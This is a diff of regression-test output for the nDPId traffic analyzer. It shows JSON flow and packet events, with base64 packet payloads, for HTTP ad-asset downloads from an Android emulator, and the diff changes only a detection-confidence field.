KUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylBBAQEBAQEA67oJHQxO9qNqC2qcOp54XRuaC1wsWuFwR53RS+nTUrNbxmJ9JapmLhplvEI3F2GMieRpJTHkI+GytFpflvEPJHge9rPVoxWfevH\/T+Tl+cOFmK4cXzYa71qIa8mzgP7VaLZfKvG\/s332zzqbT79fb1aHUwTU8zoZ4nRvboWvFiFo+da2jqaN5pqVmJj0lIqs0qAgh1sp47LRCCkQHnqowJbpHcS3TCyF99U+QkFybDW6lpWMujcNcE9VpBVStPay6+4KYh+98veHfC0\/iWjmV5xAxv1Kk9Rpn\/AHx471uipqWxGIW8yeLfo2l+j6U8z3aEy+pdu7UrnfPqx6z3CVErIXUJ5QB80SX0TIX80BAQ"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":497,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":563,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":563,"pkt_l4_len":529,"thread_ts_msec":1654385184944,"pkt":"tKXvZygQnLbQ0+MzCABFAAIl9uxAAEAGBWLAqAJ+EkBnHo8gAFD1zY28\/rI704AYAfY+nAAAAQEICpxRp1BJVe73R0VUIC9ydi16aXAtMjAyMi8wNDI4L2VuZGNhcmQtZHNwLTEzMDItZjI3MTRhMzRmNjY2MWE3MGZlZGVhMTY2N2ZiN2E5ZTQuemlwP21kNWZpbGVuYW1lPWYyNzE0YTM0ZjY2NjFhNzBmZWRlYTE2NjdmYjdhOWU0JmZvbGRlcm5hbWU9ZW5kY2FyZC1kc3AtMTMwMiZtb2Y9MSZtb2ZfdWlkPTkxMTk5Jm5faW1wPTEmbW9mX3BrZz1jb20uc2NlbmV3YXkua2Fua2FuJm5fcmVnaW9uPWZrJmFsZWNmYz0xJmJhaXRfY2xpY2s9MSZtb2ZfdGV4dG1vZD0xJmJwX3Rlc3Q9MiZ3Z2xicD0xJmN0YV90eXBlPTEmbW9mX3VzZV9nZXQ9MSZkbHN0PTAmbW9mX3VzZV9nZXQ9MSZwbG11Zz0xIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMi4xLjAgKExpbnV4OyBVOyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDEpDQpIb3N0OiBoeWJpcmQucmF5anVtcC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":497,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":497,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00866{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1654385184944,"pkt":"tKXvZygQnLbQ0+MzCABFAAFdGtZAAEAG4kDAqAJ+EkBnHo8uAFDRel74fng8vIAYAfY91AAAAQEICpxRp1H7gB08R0VUIC9ydi16aXAtMjAxOS8xMTEzL21pbmktMjYwMjkxYzIwOGJmMzM3NmI1MTExZGI4NTVlODk0NTEuemlwP21kNWZpbGVuYW1lPTI2MDI5MWMyMDhiZjMzNzZiNTExMWRiODU1ZTg5NDUxJmZvbGRlcm5hbWU9bWluaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxKQ0KSG9zdDogaHliaXJkLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2303,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":1654385184953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184953,"pkt":"nLbQ0+MztKXvZygQCABFAAXI4EEAAPgGoGkSQGcewKgCfgBQjxzkQ1FrjUA08oAYAIN68QAAAQEICkYs\/7OcUadKtLVLEjgcUYII4FHbZjHquoOia6gAb500Ti8dAwhCBQPI+mqikzoPEDELPc+SXj69jEqwdCpvDTvdYMfugkxkR1Y+CY9qVGm58StJYmYN5SvxMAz8xCmsligFCuuKmg8EZSE5OqcTkF7WWZmYJJGWhwpN7ilBu8\/gl+3Ab8Spn6tvJdeT+RsqcUG0ZFXerb57NPtt03zJpCtCoTxHMV9Zha5yoUwKNC+6e7j1ViGTaOWGh\/7JwCnGB12U4uBR548F\/rgqEud2uv0wHCBv6DuHmOo5bYd\/toEAzTnRwVytNl\/PJi1A0jYr8KsFpOACb3f7cGrTVbOZNYAAfhKkPOD4uriBbk9Jgk\/UjgwbpqX6abrGR34H+Os\/9jStodDE0Y0g3lOkmBfCKamPyPplsqvWJMBQnNHW0rSzXLwhjLCCsvswVQxnEHtu2HFz998SHtil2W03a8HGmk23nbaNYcY3Q2TQbJ3ZzG4FUhaRnvC2msLVbUsGHn\/8qqFhILJC24vplvrOmxsbreba663VzXsP1t950FpdXn11XW4T6v8OCO1QAuQXRErxFVq\/3Wbyah+mKVYtt08bMZ0HIKAAIUvKhHqZkAtfQNHQOwlIflLQ1gvauCXLAC9chbkxNKbadnsPBCGT+eVNsWhIXlnO4qie\/YB3Dn2nVklQbot4gdeaomDlGHGq2R9pxd9CVm8l9JyOW1IjlmYi4kIepJ+YLD\/gRPZSkymg00iOy0dkhWzUmLBjYKPplsOvhIi5ELVnoR4dQ7fdKWhHiLBAG9A4j2EAC4y1lGtIy6U7GUejmNJozx3D7sS1yIaLjW1\/AnhEE5Tn3wYlQUNcSbmW9EiPIws1msCzH+E5Uu15TvEJU927RoehtQDvXtR6D0i0Qq4r5lKtMY9x1WAUFjlBkqF9BUaESQB2UsBt7+aLYGJaqBfsZkpASprto2iSKUBpaREEHmhszyoycYMyWrK32VyqU7U+0B8\/j9v8HYKpxmhJ9hmaqfPgXycn03DcwMlnex1\/w0vDwfnVHTtC60LkWMig3KoxX9wp6lUobpfyzZnA1KioElYxEkVLF2DRfjSYmQmEaUL6Vt1Pw1px2QImO0RR3K\/Su8d8oWRu9X0PL5jx0aICKHpBkVigDUHjb5hz1+ER9ZpujGIXmoxXSVEVDlqITEvN1XLQn0q5WrD4RQNqo05O8NY0zUIyjeYmR0HIha8iWNR82tC+DDAAS3rFxtBufFlLahMzkSEmBJezzMOIAuYi7YaCqpZTksGSGvk200r5PKi3stxcb73ZXF7ZWG+tbb6xfPeeZWgGOW1JJ9YCDFBxJwjXXym8MTPWXyGLVLqNExYXwpJENPgu3TEwo4fsbie0u2TLY5ZAkS0FbEksjw+rnfXYKDa6Tj1apqdRm58JsDc9f3o6XkPSciEbM2sJbxaQKDeKAokNafx4rI5T7B6r\/myV2gwsY93jrVLHNNQuiu+r+M3NvePsMJ8re\/P5Entz1pZnpyPPzjYGWEIkrYJgAUSjmQm2JaWtrAsGyjyJ40iSCcRtSf1AH86Ym17gzRFqQTTeEs9X4ijRzHu1H8VBz3vPdXTmElnKhBlDqqJJI1FsUyyFCXkqDIVqSYNsV6Fsixm+M9dhWnTKi7hX4lJiuC6kPjhJK6UNeIcvhYdT5\/\/5p797\/8P\/\/eqvvv7sy7MP\/xabjQRt7X6Xwkc8\/fjPzv7kKxhaPT0jY5FpLhGCSvvgpZ7+4oMnX\/x1nZumP\/n14\/PHP1ctr0tqQdm04tmff\/q7738q6zLea7VVsGYqx+ksN3ymz2gjwFgx2a6hp\/O\/+4zwkaDjMjscMtTzf\/+n87\/\/QJlMMlM\/f\/w\/5z\/770uGghjfoqqNEk43lcb01hb7eY6\/nzpNlJ9KFcdEUlBQOZZmiMlN"} 02408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2304,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":3,"flow_last_seen":1654385184956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184956,"pkt":"nLbQ0+MztKXvZygQCABFAAXI4EgAAPgGoGISQGcewKgCfgBQjxzkQ3h3jUA08oAQAIMNwgAAAQEICkYs\/7WcUadKZmJ1Q4tNW7+zm3LzilKTMs7o+j0bU4bevfG98VcexwRoqg0MK4kroCFJI0vkItJ0sWhKhqw+9VVqDQxktos+tw4JRGmcHh\/FKDlLh6zdkg3MQ\/lsHnZqw9K8bpKO655k6IwFAFfkDIJOJsdMB+TwhRR+SOFiIw+5j\/JW34gGnNHirK\/zZi\/hc4QwIcK2rxzXZ7rsKwq47b\/gBNM4MIbxBQADwYMZQnsmuVNzekN4FKQkhHHGTTWkH\/wjQGDyySIj8Jzph54pd5aM+OhhOvR5PcMjO93tjhYc9KM4buIZr3AxnxM3iOqL5Y3DNOtFZMTe0kqYCIlor5EOmzY1\/QgcEzRxv4\/lxU4YCiiS+0\/ddMRHjjkiUXhuhD7QYUQQTZCQrhPijw50JVjw3pUlzCIsuoRiKmcNsq2sVpURgyb28KvUizskeSI14ZCZ1RGfnHTHy1yPRsG0Pt5Ma8nqKdONtNWUPEMbKU4qooS4ZVgy4ydRUqGcD3t5XLzKk6xQksEKLZeRc4zABSD22VISyrxIGnnot0UQF1jM0L5wq+PXoJypbcccDHIPqtdae6MvXKZyFZZ2Af1r5SARKk8jHFMScw1ZklPh5TmRIMY25u7JI8Kf0InpWIggg\/dCNXQ9mbCzi9IVFwQ4Bcza9Gx560XkmFinHDZS4kv+q6dM6HPsExiSjjM+3qTzEyp6QYtbZYue7chnn411pGZv4KwRjPOakaMAbYLhhCPstBZrv27XKHfgDg3UdMswyDmbrdhNZpK2+\/bwcJCkmrX3nBdsQ2VeuZ\/YA4u3j0cd1g9errygLeJTAN\/nCWDbbXhdHGF4z7CdykwDxiJacPDxG9YuwukG8499nzt4zVg40U\/jMp1lunPB3JJQoS5Bp6kxA9vvK2Fg2I3BaQrLU2XnWALaTVI1pGgZ30OUAvDFCxhKEFX\/Q9eQ1hjjNWxpFqXih\/EZbZu2sX9wk7UWkXlhwRGjhZFb93t26v1JRJhHdI1nd+wyJYqGt5\/UP4S9xI3VTwDw+41F2Yi29WTvXG\/pYAGqMGJVprBGfV8dw\/pIGjYrc8JqDjc8iMynFaFgS9VWRno\/kEa8ex8E0lXW6KSRO+38U5BEcAQa2ZmiPJVOSufJn2mHFnNtaFnQ00UpNEKFlWmg1g+m2HMDI6hkKoxWNNVaXHB7BeI37bfq0DKy4008moSOwx9MywU31umt9bQZaqMjpRF3V4DnOWXRFCtBzASqMlEpsEloiva6ZYQbYAWkcMxY5ybRoJiWx9mUKg4GcOghBqQMpMlaJSVXeGZFKl2Sb1+XUUdSwGZgyfEfyo4raVkpT+wyQpPZHBqAgGOncYulA1GZOsA\/94GmmxzjZCbCN9kynAgWzvYDvij7PUFZtMjkAvBACnPBNn3iaPQjTawbAkTcC1yfhv1ofpKiE5U2LdirARat2rkhdX\/4rJG+DaIEorg08ZpEvVnDkzmskUSlB9W+vjp\/V+aS5lkVM3k7zhoEnC+refT73qPAiB+97ySNdyAd\/Q7kYXug5+OANwWHp1LJTg\/kTpM0hWrac+UY7fWgQ8CbScQvQ7jNvfkeBpNC3rXL87XiJvZKnnKxFCuxFmcRnJQ7BpentFWts0H4Lec1Vh6Ie1JUOsAGqbQKPj08\/Fb+sNPHqQaGAhUMQMv5qLjVGC16+Ay768Xh4QOfbVnp2QvxXOq+J6pefxmdaleLIJA69iWkMygEnv\/UiI8ax5fku6tnS6jfWz1JxgQ4MCgzJju8Y+AntdNCizMmrc96qjo8fELIC6aln6uHdf6ze3P9\/l8K0Imh63d3YWSKHvLgvoT29bJdkoNvyjOuueHNZ1szJTEa6iq1dzn+UBN2G\/xCnDeBIWRhg1e0rq+0LEgtBi8qgQyMbqwUz1KCNzlpSIzr13Jt"} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2304,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184938,"flow_last_seen":1654385184956,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3201,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385184956,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2304,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184938,"flow_last_seen":1654385184956,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3201,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385184956,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 02398{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2315,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184965,"pkt":"nLbQ0+MztKXvZygQCABFAAXIGm4AAPgGZj0SQGcewKgCfgBQjyD+smSW9c2PrYAQAIOKbwAAAQEICklV7wucUadQ5ogdq\/iosAYQHnuYoAkvkdnGEx7sgfMQlGGrFxZA1yFkqy5MoicrPqJw3gr9hAgjam6KaAwuXrhWKQF6GuXGbBvVErM+rqhTqw0S+mOoHLEY4s4FqWJIQ1cT5cQHITPEUA8NmsKXQx4OPNTUF1gsmkFJG+W9FLWdk8qI2aIQV\/yYMeSGTw74FvYOMM4DyYjkedi25Hlaxn6nKYMGLSn2thPUrK2WshGdhHAxCSxIaZduwRhEPOo4bZFCUfAig1xMlQhT102Z6\/h1jyy9Y2FOTqxE4We1SIl3jgw9N+ghK12R0K7udpiQwRquQJKK59ShtftqxFuHqgWu9ioVh2g7O7EbTedwRtJMXbm0ah2kTJ32xO0TZEG94g8bjMzkcl1m3NuSQw+Jl+nhpxe0XCTzjwmTR3B\/Ayh0joMwTcVU2JgiBD0+DOZ\/XeBiYQ47TG1YlpfqWRWnMCzc7Wb7RbHp9OvR2Dc\/\/dwQkuEIkywFK3CRRNMAQasTEI24+xJG+ceiAlhwwXcWRghi2LpCgYAXHIsWQg5EML3sL0y6ODzBfVQUS9EEMXT\/2DwkfHfhkvkhNgQM4\/HEWo2BJFkgiwENsFXve6AnZRxrdslQMuUEOyqAwAsg8ZYXYIM\/iSfJEwHuox95SJebwd6lXVS\/GZqiCrX5qldHVAhpCpb5CVC06kelCqTHtkKWudqMQc1RbGEIfFZhjmJQ86si71pVcWKFDatzRg5mMPpjAXegcI0htoQUKHqgjP8bD4GhWKuktB2K8eCMtWlkSJoUINAL4oOUMURQegH1KF0FB2ahoJCJ9vVZg1pKEWlCBA9EE\/oz8327GODGRhfm0Y7ZA+DkZIe4ubBhHXkA10YPFILhA+cgoMIIs2nF6k3Yg9gZFOzK5gseWgqegfNZe5U2cULZfTDMGvNjVhhkqLtrDRuG2aoghuLXZMY5euQeWmygK9GtF2hzgV6OIMtTMVTz793WI9WGVpxqcWjE0WCzJ67\/Odismm8FSxIv3cjWS2JgaDe4UAykmF1npgOZ8mc+HRFFsJsZs2nokg1Z9LbmG\/uS8WdEClrpbQGk7OzCpWqnz5pP\/hAxjot+MnBHFeI2gNKiuSjgHGzxUDpBjyR1KRIjWvfIoEeNcasmZg8vOsgdBlCID0kHWcB\/Wnhg6hUicCWIeMDYHjWMEqAMEU+sW2zvpBSItTGVMR\/tG5FDGjnwRbCFQ7H0Q1pyVsYKS\/+bgPQMt6tmN\/QQSVGaqKzfqW73JIcui9eEBVY+RQolSMRVEuLfLL3KcnHV1htUZmHMfXn68WLXop3FFrRIv4ND6JZOBmHJnH7V3piuFJLPipHp4rFbXPJLpaxBs25dRRta2P8nbMKHH8zgQUJvtjGbPG5Qoas8jKRpOG9PfPUMkNTkQdcI05Kq69VlOXml6It2UQduxJOKGs42T7AhFKJPnmjEuxpFJp7Qmp4cgdGB8nTOxTI7UkGRz6h5NUjZQdDvoJgOb5wxHz6DtpYAtRljv5SjxwtRvetqHLvPS5dqQEKiklws6rQRJRJSgWJc6INl2LpQ2LwzXIzDrxG4KyZkZEea\/BhiYr2lFa9kOoKUxYVoH6stGFraqU0hCb8OxD1kbuo2v4FqacYgYMLVetH0UaKQShTjaFivt0JdBLGUcYiCviMaxoNkPkjpNksgTJENrYzCczP\/c86QKZuvwdgwNCEJas5+M0FA7IwteDjfuG4H+vXhwzxQy+RholpcIZkEH3EYAL9KvuTKixOHHulpoYKtamwQolbV0LFtwXQhkMOgP8lG2b2ZJ+IUM0qTnh19rIOITZJ1INZMWCLVkUGyGrTiGn00YVvPbzgv0rlIYYoB86xhRlni1rNpEhZn7dSqR2Gz1MHTVgUr9qKTdXDaNCJWayo2otmdYEEv"} 02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2316,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184965,"pkt":"nLbQ0+MztKXvZygQCABFAAXIGm8AAPgGZjwSQGcewKgCfgBQjyD+smoq9c2PrYAYAIN7OgAAAQEICklV7wucUadQJspEi0CUOOmI3Cvceu7ZTiQFwaD38Js\/p\/xjAp0j4xbiQNQqOyBYr5L0IIs0msCoEYCCdXXdrZEsJEixghP9dW2haBiWE90tiwDKNL2M4KmVaiFSazRQsJxUArOXEYbM7Mk6ouyCMoHe6uCJlL0cyZtIWWKhOIsm6ZGti94qIbr5CNRdSWJmU6uEfjypNj3HPKIJZrjuhyY9Cu2ZvINqzgm4caq8NN3Ol4TW4lXCpbPWwUSjgKN85uSLF0rMSsFoUgIprHQPciOblWTBOTITmrFc2UGRtjRj1LVRrpKUpZeVdZN4RSo6tznl0hQ9q7XjysoNU7sPtQQAlDgnUfNPxezctohspJSSaW9icUrFWCtcwLVCtqHJjGTqBf27OmPKKfkfG7cIR1palknv7gysOseGXawVw8okfeiTbShNKrQNzQwd2ZYaHbnsqalY9fIprU9uopYlGr1jz4QbdlC+Xlck6sWEWatNiYA6+mqPGc3WxcuksVBq0JSEfGbpESVQtev4ss0yFbv3Ms4MrIkJO6ZKEVHnOGm7baWoO9oDVS\/VcNqDH99a7piWhDvruNwEIdqktI2GDvEDR2MN+cRA0Drq2ZYeS0jdoQPJysWM8ZCqw7r86FgOTdw\/86RtBT31VleuPjz3IVXMyFirKDF4+Ve2++jcSZHmoXsDy3mQyZ5lCoCfRHm5eAd8ygVLOOwlU84ma9sRJJhQRw9RlIV4BQwStxE\/P+KYRlMT9C1FlrETthUtJn08pmc4CQf5Y64MMSj51HOUvlF1VzoUdG8NWiAa7kb1c\/rFFRcNASFdygmZC0L5oBNNcpSJ6Y5SFUryQF2kzJmxJdUKOnuoLqK5VaUVFBbdmnQzhlj0rxhHV4LhD6zUnEEjQZxFlZ7wA02LeOGLF4IJOUw9qRdPJKkaNW6WtEkbh+a+82HiCzidkwS8ebcWJ1duWnUmydiJt3assevDFk\/X8DFpDcwKd+5ns4Xkhm+2jDq2\/WUCZkq2L1gyzrz9ogyVkhOaNAn28stqziCDjsaLoBQFnh0+pIlPsszStPAV2eh+MvAqccRlLZAYHODR6n6NY5bf+BYIuf9ITT+IIxa\/4VN0UVnUvxrRwoIlUSK0sQ76UbEaURf+evWxATWLaR8y07ulM0Caqds3CjhoCOii7C51OwgaSrstoDBZPcUezxEXmVHSiwlGLx53FAZqoDlcUPLsr9gg2Flf6M1WdfOntS2Jtlu2fbTnz9R9PoHpWfgnrlmDARFCtPhHhajELohr\/Q1PRAY9DS9EjCigt3tqC47UwaU4OoHNoTqRBJDQYjzeR6HqA+79NTpFmHOJ\/uDYfkU9w\/cYaGh2Oit6cuhN7ZwdaS02Fd1az6abPC9BnFbpndrIJxzSL4mmYDMhHhJ8SM3hs1Tpj+ZL\/gsL6Q8PBrwU8cvM3h5+HrSurDwTRw3amJUNhKXU8BUtCpWoiQqzmmxbhhYZM\/XEqRfDnhULOCEo255OrNwVCkUI7kOsZimTiobTTVaISLkpB7LFs3KqMfOIT4bdyQFmwlVZtGIdT8kpJbgMVPYXqYzaQYyWDPRG2IwaY+nqvmsyj9xZ5oXw7iJkTSkapYZPqKt4i0AcaR7dvMEaCMgCWyikf4axtIXxAc9FMUBUbO6Gbulb0dAH+ywz4t4rgH0BUbKxsq6DLVrxR+Dz3QoSsGslYOjRUxc2nspxMWTnKnbO2+WaKGg1SFoZL97KgRsxHVZt6JuwA1BWIWn7WEPJHy5EWtPF0sCx6QRRsnaDyUNKVgC0bIIsiHciEQeN5GvYNZNmOzanRtRwJ2oP+wBB3AiolTeFEWodeEKa9Vx14liiPDCIQ07+AirkzEaTcwWcI8o2WPc9DCGHQ9deUQQrUozjKmsmbQrE6aq9YqjpDlm0SJhe"} 